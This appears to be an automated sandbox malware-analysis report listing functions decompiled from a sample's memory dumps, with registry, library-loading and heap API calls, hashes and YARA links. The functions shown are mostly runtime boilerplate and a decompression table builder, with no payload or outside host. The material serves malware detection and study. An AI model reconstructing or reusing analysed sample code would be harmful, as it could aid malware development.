                                                                                                                                                  • Opcode ID: 1ad3c889ce756e040fec02104620dcea70f76bff5fd20d07ebb630bbf322043e
                                                                                                                                                  • Instruction ID: d9e549172ea3667193b34ee15acf669d26b8c7df00a87157738d74d5e78945f1
                                                                                                                                                  • Opcode Fuzzy Hash: 1ad3c889ce756e040fec02104620dcea70f76bff5fd20d07ebb630bbf322043e
                                                                                                                                                  • Instruction Fuzzy Hash: E24144B4D006489FDB10DFA8C584A9EBBF5EB48314F28842AE809AB350D775AC49CF55
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00488F08, Relevance: 1.6, APIs: 1, Instructions: 88registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,00000000), ref: 00489EF1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927390291.0000000000480000.00000040.00000001.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: QueryValue
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3660427363-0
                                                                                                                                                  • Opcode ID: 484ce2409b631e2ca4808d02bed4087d35f1af79a14e62af4e8be3f2e1c56a67
                                                                                                                                                  • Instruction ID: 9ab22681cbc86afc593f69be4b848de3f90a462a974a75a4457cbe21503dfb11
                                                                                                                                                  • Opcode Fuzzy Hash: 484ce2409b631e2ca4808d02bed4087d35f1af79a14e62af4e8be3f2e1c56a67
                                                                                                                                                  • Instruction Fuzzy Hash: E031E2B1D00658DFCB10DF9AC884ADEBBF5BF48310F14842AE919AB350D7789945CF95
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00488EFC, Relevance: 1.6, APIs: 1, Instructions: 80registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • RegOpenKeyExW.KERNELBASE(80000001,00000000,?,?,?), ref: 00489C78
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927390291.0000000000480000.00000040.00000001.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Open
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 71445658-0
                                                                                                                                                  • Opcode ID: 6da583b5d9071b6a78884ddea879cca6aac11f0bf156fe1fc4c399a547967fc0
                                                                                                                                                  • Instruction ID: 279ce5e3ab444b5d10c077ebf5c456a6b076bb9e0a352b3d4c429893749e0e96
                                                                                                                                                  • Opcode Fuzzy Hash: 6da583b5d9071b6a78884ddea879cca6aac11f0bf156fe1fc4c399a547967fc0
                                                                                                                                                  • Instruction Fuzzy Hash: 0531E2B0D01648DFCB10DF99C584A9EBBF4AB08314F28842AE809A7350D779AD45CB99
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 008669F4, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,00000000,?,008677F1,00000800), ref: 00867882
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.931860481.0000000000860000.00000040.00000001.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                  • Opcode ID: 58136e56a455070569d21b1822c3b93d958143677a753fa98c20f98c60201c2c
                                                                                                                                                  • Instruction ID: e61f7e26d8ce099d5f414e98286972a2ea59d81314a1e1247e846cc02e38ac4c
                                                                                                                                                  • Opcode Fuzzy Hash: 58136e56a455070569d21b1822c3b93d958143677a753fa98c20f98c60201c2c
                                                                                                                                                  • Instruction Fuzzy Hash: 181106B6D042099FDB10CF9AC448ADEFBF4FB58318F11842AD919A7700C375A945CFA5
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0081D800, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 0081D867
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.931737670.0000000000810000.00000040.00000001.sdmp, Offset: 00810000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: GlobalMemoryStatus
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1890195054-0
                                                                                                                                                  • Opcode ID: 101f220f17f6f0011e9006be8bd68696ecdf73cd69cabd053d526c3225964adf
                                                                                                                                                  • Instruction ID: 3a97454665d0ad164010b7a5917a4694f9498cc2212967409c6be546ccd77d9e
                                                                                                                                                  • Opcode Fuzzy Hash: 101f220f17f6f0011e9006be8bd68696ecdf73cd69cabd053d526c3225964adf
                                                                                                                                                  • Instruction Fuzzy Hash: D51103B1C006599BCB00DFAAD444BDEFBB4BF48324F11812AD818A7740D378A945CFA1
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0040D534, Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040D534(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x4234b4 = _t6;
				if(_t6 != 0) {
					 *0x4250b0 = 1;
					return 1;
				} else {
					return _t6;
				}
			}




                                                                                                                                                  0x0040d549
                                                                                                                                                  0x0040d54f
                                                                                                                                                  0x0040d556
                                                                                                                                                  0x0040d55d
                                                                                                                                                  0x0040d563
                                                                                                                                                  0x0040d559
                                                                                                                                                  0x0040d559
                                                                                                                                                  0x0040d559

                                                                                                                                                  APIs
                                                                                                                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927182410.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.927267311.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.927294895.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateHeap
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 10892065-0
                                                                                                                                                  • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                                  • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                                                                                                  • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                                  • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 004104E0, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E004104E0() {
				void* _t1;

				_t1 = E0041046E(0); // executed
				return _t1;
			}




                                                                                                                                                  0x004104e2
                                                                                                                                                  0x004104e8

                                                                                                                                                  APIs
                                                                                                                                                  • __encode_pointer.LIBCMT ref: 004104E2
                                                                                                                                                    • Part of subcall function 0041046E: TlsGetValue.KERNEL32(00000000,?,004104E7,00000000,00413B8E,00423648,00000000,00000314,?,0040EC11,00423648,Microsoft Visual C++ Runtime Library,00012010), ref: 00410480
                                                                                                                                                    • Part of subcall function 0041046E: TlsGetValue.KERNEL32(00000004,?,004104E7,00000000,00413B8E,00423648,00000000,00000314,?,0040EC11,00423648,Microsoft Visual C++ Runtime Library,00012010), ref: 00410497
                                                                                                                                                    • Part of subcall function 0041046E: RtlEncodePointer.NTDLL(00000000,?,004104E7,00000000,00413B8E,00423648,00000000,00000314,?,0040EC11,00423648,Microsoft Visual C++ Runtime Library,00012010), ref: 004104D5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927182410.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.927267311.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.927294895.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Value$EncodePointer__encode_pointer
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2585649348-0
                                                                                                                                                  • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                                                                                  • Instruction ID: 0e51a9b5fb3a4ef556cbf6530202f05b5f2c67c7b2b168a65c09d71fd2c62196
                                                                                                                                                  • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  Function 0040CE09, Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 85%
                                                                                                                                                  			E0040CE09(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x422234; // 0x4fcd548
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x423b98 = _t6;
				 *0x423b94 = _t22;
				 *0x423b90 = _t25;
				 *0x423b8c = _t21;
				 *0x423b88 = _t27;
				 *0x423b84 = _t26;
				 *0x423bb0 = ss;
				 *0x423ba4 = cs;
				 *0x423b80 = ds;
				 *0x423b7c = es;
				 *0x423b78 = fs;
				 *0x423b74 = gs;
				asm("pushfd");
				_pop( *0x423ba8);
				 *0x423b9c =  *_t31;
				 *0x423ba0 = _v0;
				 *0x423bac =  &_a4;
				 *0x423ae8 = 0x10001;
				_t11 =  *0x423ba0; // 0x0
				 *0x423a9c = _t11;
				 *0x423a90 = 0xc0000409;
				 *0x423a94 = 1;
				_t12 =  *0x422234; // 0x4fcd548
				_v812 = _t12;
				_t13 =  *0x422238; // 0xfb032ab7
				_v808 = _t13;
				 *0x423ae0 = IsDebuggerPresent();
				_push(1);
				E004138FC(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x41fb80);
				if( *0x423ae0 == 0) {
					_push(1);
					E004138FC(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                                                                                                                  0x0040ce09
                                                                                                                                                  0x0040ce09
                                                                                                                                                  0x0040ce09
                                                                                                                                                  0x0040ce09
                                                                                                                                                  0x0040ce09
                                                                                                                                                  0x0040ce09
                                                                                                                                                  0x0040ce09
                                                                                                                                                  0x0040ce0f
                                                                                                                                                  0x0040ce11
                                                                                                                                                  0x0040ce11
                                                                                                                                                  0x00413644
                                                                                                                                                  0x00413649
                                                                                                                                                  0x0041364f
                                                                                                                                                  0x00413655
                                                                                                                                                  0x0041365b
                                                                                                                                                  0x00413661
                                                                                                                                                  0x00413667
                                                                                                                                                  0x0041366e
                                                                                                                                                  0x00413675
                                                                                                                                                  0x0041367c
                                                                                                                                                  0x00413683
                                                                                                                                                  0x0041368a
                                                                                                                                                  0x00413691
                                                                                                                                                  0x00413692
                                                                                                                                                  0x0041369b
                                                                                                                                                  0x004136a3
                                                                                                                                                  0x004136ab
                                                                                                                                                  0x004136b6
                                                                                                                                                  0x004136c0
                                                                                                                                                  0x004136c5
                                                                                                                                                  0x004136ca
                                                                                                                                                  0x004136d4
                                                                                                                                                  0x004136de
                                                                                                                                                  0x004136e3
                                                                                                                                                  0x004136e9
                                                                                                                                                  0x004136ee
                                                                                                                                                  0x004136fa
                                                                                                                                                  0x004136ff
                                                                                                                                                  0x00413701
                                                                                                                                                  0x00413709
                                                                                                                                                  0x00413714
                                                                                                                                                  0x00413721
                                                                                                                                                  0x00413723
                                                                                                                                                  0x00413725
                                                                                                                                                  0x0041372a
                                                                                                                                                  0x0041373e

                                                                                                                                                  APIs
                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927182410.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.927267311.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.927294895.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2579439406-0
                                                                                                                                                  • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                  • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                                                                  • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                  • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00408C60, Relevance: 2.9, Strings: 2, Instructions: 377COMMONCrypto
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00408C60(signed int _a4, intOrPtr _a8, signed int _a12, intOrPtr* _a16, signed int* _a20, signed short* _a24) {
				short _v30;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				signed int _v96;
				signed int _v100;
				signed short* _v104;
				intOrPtr _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed short _v122;
				signed int _v123;
				char _v124;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				void* _t216;
				signed int _t217;
				signed int _t219;
				intOrPtr _t220;
				signed int _t223;
				signed short _t225;
				signed int _t226;
				signed int _t228;
				signed int _t233;
				signed int _t240;
				signed int _t248;
				signed int _t251;
				void* _t254;
				signed int _t260;
				intOrPtr* _t261;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				short _t270;
				intOrPtr* _t281;
				signed char _t285;
				signed int _t297;
				signed int _t299;
				intOrPtr _t305;
				signed int _t308;
				signed int _t309;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t327;
				signed int _t333;
				signed int _t336;
				char _t337;
				intOrPtr* _t340;
				signed int* _t343;
				signed int _t344;
				signed short* _t345;
				signed int _t348;
				intOrPtr* _t349;
				signed short* _t350;
				intOrPtr _t351;
				intOrPtr _t352;
				signed int _t353;
				void* _t354;

				_t354 =  &_v124;
				_t308 = _a12;
				_t352 = _a8;
				_v64 = 0xbadbad;
				_v60 = 0 << 0x10;
				_v56 = 0 << 0x10;
				_v52 = 0 << 0x10;
				_v48 = 0 << 0x10;
				_v44 = 0 << 0x10;
				_v40 = 0 << 0x10;
				_v36 = 0 << 0x10;
				_t211 = 0;
				if(_t308 > 0) {
					do {
						 *((short*)(_t354 + 0x48 + ( *(_t352 + _t211 * 2) & 0x0000ffff) * 2)) =  *((short*)(_t354 + 0x48 + ( *(_t352 + _t211 * 2) & 0x0000ffff) * 2)) + 1;
						_t211 = _t211 + 1;
					} while (_t211 < _t308);
				}
				_t343 = _a20;
				_t212 =  *_t343;
				_v120 = _t212;
				_t263 = 0xf;
				while( *((short*)(_t354 + 0x48 + _t263 * 2)) == 0) {
					_t263 = _t263 - 1;
					if(_t263 >= 1) {
						continue;
					}
					break;
				}
				_v112 = _t263;
				if(_t212 > _t263) {
					_v120 = _t263;
				}
				if(_t263 != 0) {
					_t344 = 1;
					while(1) {
						__eflags =  *((short*)(_t354 + 0x48 + _t344 * 2));
						if( *((short*)(_t354 + 0x48 + _t344 * 2)) != 0) {
							break;
						}
						__eflags =  *((short*)(_t354 + 0x4a + _t344 * 2));
						if( *((short*)(_t354 + 0x4a + _t344 * 2)) != 0) {
							_t344 = _t344 + 1;
						} else {
							__eflags =  *((short*)(_t354 + 0x4c + _t344 * 2));
							if( *((short*)(_t354 + 0x4c + _t344 * 2)) != 0) {
								_t344 = _t344 + 2;
							} else {
								__eflags =  *((short*)(_t354 + 0x4e + _t344 * 2));
								if( *((short*)(_t354 + 0x4e + _t344 * 2)) != 0) {
									_t344 = _t344 + 3;
								} else {
									__eflags =  *((short*)(_t354 + 0x50 + _t344 * 2));
									if( *((short*)(_t354 + 0x50 + _t344 * 2)) != 0) {
										_t344 = _t344 + 4;
										__eflags = _t344;
									} else {
										_t344 = _t344 + 5;
										__eflags = _t344 - 0xf;
										if(_t344 <= 0xf) {
											continue;
										} else {
										}
									}
								}
							}
						}
						break;
					}
					__eflags = _v120 - _t344;
					if(_v120 < _t344) {
						_v120 = _t344;
					}
					_t309 = 1;
					_t213 = 1;
					while(1) {
						_t309 = _t309 + _t309 - ( *(_t354 + 0x48 + _t213 * 2) & 0x0000ffff);
						__eflags = _t309;
						if(_t309 < 0) {
							break;
						}
						_t213 = _t213 + 1;
						__eflags = _t213 - 0xf;
						if(_t213 <= 0xf) {
							continue;
						} else {
							_t333 = _a4;
							__eflags = _t309;
							if(_t309 <= 0) {
								L32:
								_v30 = 0;
								_t216 = 2;
								do {
									_t270 =  *((intOrPtr*)(_t354 + _t216 + 0x6c)) +  *((intOrPtr*)(_t354 + _t216 + 0x4c));
									_t216 = _t216 + 2;
									 *((short*)(_t354 + _t216 + 0x6c)) = _t270;
									__eflags = _t216 - 0x1e;
								} while (_t216 < 0x1e);
								_t264 = _a12;
								_t217 = 0;
								__eflags = _t264;
								if(_t264 > 0) {
									do {
										__eflags =  *(_t352 + _t217 * 2);
										if( *(_t352 + _t217 * 2) != 0) {
											 *(_a24 + ( *(_t354 + 0x6c + ( *(_t352 + _t217 * 2) & 0x0000ffff) * 2) & 0x0000ffff) * 2) = _t217;
											_t327 =  *(_t352 + _t217 * 2) & 0x0000ffff;
											_t75 = _t354 + 0x6c + _t327 * 2;
											 *_t75 =  *(_t354 + 0x6c + _t327 * 2) + 1;
											__eflags =  *_t75;
										}
										_t217 = _t217 + 1;
										__eflags = _t217 - _t264;
									} while (_t217 < _t264);
								}
								_t219 = _t333;
								__eflags = _t219;
								if(_t219 == 0) {
									_t220 = _a24;
									_v88 = _t220;
									_v96 = 0x13;
									goto L43;
								} else {
									__eflags = _t219 == 1;
									if(_t219 == 1) {
										_v88 = 0x41e28e;
										_t220 = 0x41e2ce;
										_v96 = 0x100;
										L43:
										_v92 = _t220;
									} else {
										_v88 = 0x41e510;
										_v92 = 0x41e550;
										_v96 = 0xffffffff;
									}
								}
								_v108 =  *_a16;
								_t223 = 1 << _v120;
								_v84 = 0xffffffff;
								_t353 = 0;
								_t265 = 0;
								_t97 = _t223 - 1; // 0x0
								_v116 = _t344;
								_v80 = 1;
								_v100 = 1;
								_v76 = _t97;
								__eflags = _t333 - 1;
								if(_t333 != 1) {
									L46:
									_v104 = _a24;
									while(1) {
										L47:
										_t345 = _v104;
										_t225 =  *_t345 & 0x0000ffff;
										_v123 = _v116 - _t265;
										__eflags = (_t225 & 0x0000ffff) - _v96;
										if(__eflags >= 0) {
											if(__eflags <= 0) {
												__eflags = 0;
												_v124 = 0x60;
												_v122 = 0;
											} else {
												_t254 = ( *_t345 & 0x0000ffff) + ( *_t345 & 0x0000ffff);
												_v124 =  *((intOrPtr*)(_t254 + _v92));
												_v122 =  *((intOrPtr*)(_t254 + _v88));
											}
										} else {
											_v124 = 0;
											_v122 = _t225;
										}
										_t226 = _v80;
										_v72 = _t226;
										_t336 = (_t353 >> _t265) + _t226;
										__eflags = _t336;
										_t281 = _v108 + _t336 * 4;
										_t337 = _v124;
										do {
											L53:
											_t226 = _t226 - 1;
											_t281 = _t281 - 4;
											 *_t281 = _t337;
											__eflags = _t226;
										} while (_t226 != 0);
										_t316 = _v116;
										_t228 = 1 << _t316 - 1;
										__eflags = _t353 & 0x00000001;
										if((_t353 & 0x00000001) != 0) {
											do {
												_t228 = _t228 >> 1;
												__eflags = _t353 & _t228;
											} while ((_t353 & _t228) != 0);
										}
										__eflags = _t228;
										if(_t228 == 0) {
											_t353 = 0;
											__eflags = 0;
										} else {
											_t132 = _t228 - 1; // 0x0
											_t353 = (_t132 & _t353) + _t228;
										}
										_v104 =  &(_v104[1]);
										 *(_t354 + 0x4c + _t316 * 2) =  *(_t354 + 0x4c + _t316 * 2) + 0xffff;
										__eflags =  *(_t354 + 0x4c + _t316 * 2) & 0x0000ffff;
										if(( *(_t354 + 0x4c + _t316 * 2) & 0x0000ffff) != 0) {
											L62:
											__eflags = _t316 - _v120;
											if(_t316 <= _v120) {
												L47:
												_t345 = _v104;
												_t225 =  *_t345 & 0x0000ffff;
												_v123 = _v116 - _t265;
												__eflags = (_t225 & 0x0000ffff) - _v96;
												if(__eflags >= 0) {
													if(__eflags <= 0) {
														__eflags = 0;
														_v124 = 0x60;
														_v122 = 0;
													} else {
														_t254 = ( *_t345 & 0x0000ffff) + ( *_t345 & 0x0000ffff);
														_v124 =  *((intOrPtr*)(_t254 + _v92));
														_v122 =  *((intOrPtr*)(_t254 + _v88));
													}
												} else {
													_v124 = 0;
													_v122 = _t225;
												}
												_t226 = _v80;
												_v72 = _t226;
												_t336 = (_t353 >> _t265) + _t226;
												__eflags = _t336;
												_t281 = _v108 + _t336 * 4;
												_t337 = _v124;
												goto L53;
											} else {
												L63:
												_t348 = _v76 & _t353;
												_v68 = _t348;
												__eflags = _t348 - _v84;
												if(_t348 == _v84) {
													continue;
												} else {
													L64:
													__eflags = _t265;
													if(_t265 == 0) {
														_t265 = _v120;
													}
													_v108 = _v108 + _v72 * 4;
													_t285 = _v116 - _t265;
													_t318 = _t265 + _t285;
													_t233 = 1 << _t285;
													__eflags = _t318 - _v112;
													if(_t318 < _v112) {
														_t350 = _t354 + 0x4c + _t318 * 2;
														while(1) {
															_t240 = _t233 - ( *_t350 & 0x0000ffff);
															__eflags = _t240;
															if(_t240 <= 0) {
																break;
															}
															_t318 = _t318 + 1;
															_t285 = _t285 + 1;
															_t350 =  &(_t350[1]);
															_t233 = _t240 + _t240;
															__eflags = _t318 - _v112;
															if(_t318 < _v112) {
																continue;
															}
															break;
														}
														_t348 = _v68;
													}
													_v100 = _v100 + 1;
													__eflags = _a4 - 1;
													_v80 = 1 << _t285;
													if(_a4 != 1) {
														L73:
														_t319 = _t348;
														_t349 = _a16;
														 *( *_t349 + _t319 * 4) = _t285;
														 *((char*)( *_t349 + 1 + _t319 * 4)) = _v120;
														_v84 = _t319;
														 *((short*)( *_t349 + 2 + _t319 * 4)) = _v108 -  *_t349 >> 2;
														continue;
														do {
															do {
																goto L47;
															} while (_t316 <= _v120);
															goto L63;
														} while (_t348 == _v84);
														goto L64;
													} else {
														__eflags = _v100 - 0x5b0;
														if(_v100 >= 0x5b0) {
															goto L84;
														} else {
															goto L73;
														}
													}
												}
											}
										} else {
											__eflags = _t316 - _v112;
											if(_t316 == _v112) {
												_t340 = _a16;
												_v124 = 0x40;
												_v123 = _t316 - _t265;
												_v122 = 0;
												__eflags = _t353;
												if(_t353 != 0) {
													_t351 = _v108;
													do {
														__eflags = _t265;
														if(_t265 != 0) {
															__eflags = (_v76 & _t353) - _v84;
															if((_v76 & _t353) != _v84) {
																_t251 = _v120;
																_t351 =  *_t340;
																_t265 = 0;
																__eflags = 0;
																_v116 = _t251;
																_v123 = _t251;
																_t316 = _t251;
															}
														}
														 *((intOrPtr*)(_t351 + (_t353 >> _t265) * 4)) = _v124;
														_t248 = 1 << _t316 - 1;
														__eflags = _t353 & 0x00000001;
														if((_t353 & 0x00000001) != 0) {
															do {
																_t248 = _t248 >> 1;
																__eflags = _t353 & _t248;
															} while ((_t353 & _t248) != 0);
														}
														__eflags = _t248;
														if(_t248 != 0) {
															goto L82;
														}
														goto L83;
														L82:
														_t203 = _t248 - 1; // 0x0
														_t297 = (_t203 & _t353) + _t248;
														__eflags = _t297;
														_t353 = _t297;
													} while (_t297 != 0);
												}
												L83:
												 *_t340 =  *_t340 + _v100 * 4;
												 *_a20 = _v120;
												__eflags = 0;
												return 0;
											} else {
												_t299 =  *(_a8 + ( *_v104 & 0x0000ffff) * 2) & 0x0000ffff;
												_v116 = _t299;
												_t316 = _t299;
												goto L62;
											}
										}
										goto L85;
									}
								} else {
									__eflags = _t223 - 0x5b0;
									if(_t223 >= 0x5b0) {
										L84:
										return 1;
									} else {
										goto L46;
									}
								}
							} else {
								__eflags = _t333;
								if(_t333 == 0) {
									L30:
									_t260 = _t213 | 0xffffffff;
									__eflags = _t260;
									return _t260;
								} else {
									__eflags = _t263 - 1;
									if(_t263 == 1) {
										goto L32;
									} else {
										goto L30;
									}
								}
							}
						}
						goto L85;
					}
					_t214 = _t213 | 0xffffffff;
					__eflags = _t214;
					return _t214;
				} else {
					_t261 = _a16;
					_v122 = 0;
					_v124 = 0x40;
					_v123 = 1;
					_t305 = _v124;
					 *((intOrPtr*)( *_t261)) = _t305;
					 *_t261 =  *_t261 + 4;
					 *((intOrPtr*)( *_t261)) = _t305;
					 *_t261 =  *_t261 + 4;
					 *_t343 = 1;
					return 0;
				}
				L85:
			}













































































                                                                                                                                                  0x00408c60
                                                                                                                                                  0x00408c63
                                                                                                                                                  0x00408c78
                                                                                                                                                  0x00408c7f
                                                                                                                                                  0x00408c83
                                                                                                                                                  0x00408c87
                                                                                                                                                  0x00408c8b
                                                                                                                                                  0x00408c8f
                                                                                                                                                  0x00408c93
                                                                                                                                                  0x00408c97
                                                                                                                                                  0x00408c9b
                                                                                                                                                  0x00408c9f
                                                                                                                                                  0x00408ca4
                                                                                                                                                  0x00408cb0
                                                                                                                                                  0x00408cb5
                                                                                                                                                  0x00408cbe
                                                                                                                                                  0x00408cbf
                                                                                                                                                  0x00408cb0
                                                                                                                                                  0x00408cc3
                                                                                                                                                  0x00408cca
                                                                                                                                                  0x00408ccc
                                                                                                                                                  0x00408cd0
                                                                                                                                                  0x00408cd5
                                                                                                                                                  0x00408cdd
                                                                                                                                                  0x00408ce1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00408ce1
                                                                                                                                                  0x00408ce3
                                                                                                                                                  0x00408ce9
                                                                                                                                                  0x00408ceb
                                                                                                                                                  0x00408ceb
                                                                                                                                                  0x00408cf1
                                                                                                                                                  0x00408d2c
                                                                                                                                                  0x00408d31
                                                                                                                                                  0x00408d31
                                                                                                                                                  0x00408d37
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00408d39
                                                                                                                                                  0x00408d3f
                                                                                                                                                  0x00408d63
                                                                                                                                                  0x00408d41
                                                                                                                                                  0x00408d41
                                                                                                                                                  0x00408d47
                                                                                                                                                  0x00408d66
                                                                                                                                                  0x00408d49
                                                                                                                                                  0x00408d49
                                                                                                                                                  0x00408d4f
                                                                                                                                                  0x00408d6b
                                                                                                                                                  0x00408d51
                                                                                                                                                  0x00408d51
                                                                                                                                                  0x00408d57
                                                                                                                                                  0x00408d70
                                                                                                                                                  0x00408d70
                                                                                                                                                  0x00408d59
                                                                                                                                                  0x00408d59
                                                                                                                                                  0x00408d5c
                                                                                                                                                  0x00408d5f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00408d61
                                                                                                                                                  0x00408d5f
                                                                                                                                                  0x00408d57
                                                                                                                                                  0x00408d4f
                                                                                                                                                  0x00408d47
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00408d3f
                                                                                                                                                  0x00408d73
                                                                                                                                                  0x00408d77
                                                                                                                                                  0x00408d79
                                                                                                                                                  0x00408d79
                                                                                                                                                  0x00408d7d
                                                                                                                                                  0x00408d82
                                                                                                                                                  0x00408d84
                                                                                                                                                  0x00408d8b
                                                                                                                                                  0x00408d8b
